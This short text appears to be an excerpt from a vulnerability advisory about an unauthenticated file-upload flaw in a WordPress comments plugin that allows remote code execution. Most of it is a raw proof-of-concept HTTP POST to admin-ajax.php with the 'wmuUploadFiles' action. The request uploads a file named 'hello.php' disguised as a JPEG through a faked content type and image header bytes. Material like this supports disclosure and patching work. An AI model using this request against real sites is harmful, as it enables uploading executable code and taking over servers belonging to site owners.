This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server.
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: URL Content-Length: 774 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUGWBOKSwsalnzhha Origin: http://URL Referer: http://URL Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Connection: close ------WebKitFormBoundaryUGWBOKSwsalnzhha Content-Disposition: form-data; name=“action” wmuUploadFiles ------WebKitFormBoundaryUGWBOKSwsalnzhha Content-Disposition: form-data; name=“wmu_nonce” aede3ab0b2 ------WebKitFormBoundaryUGWBOKSwsalnzhha Content-Disposition: form-data; name=“wmuAttachmentsData” undefined ------WebKitFormBoundaryUGWBOKSwsalnzhha Content-Disposition: form-data; name=“wmu_files[0]”; filename=“hello.php” Content-Type: image/jpeg ÿØÿájExifMM*i>¨ÀÿàJFIFÿÛC ------WebKitFormBoundaryUGWBOKSwsalnzhha Content-Disposition: form-data; name=“postId” 393 ------WebKitFormBoundaryUGWBOKSwsalnzhha–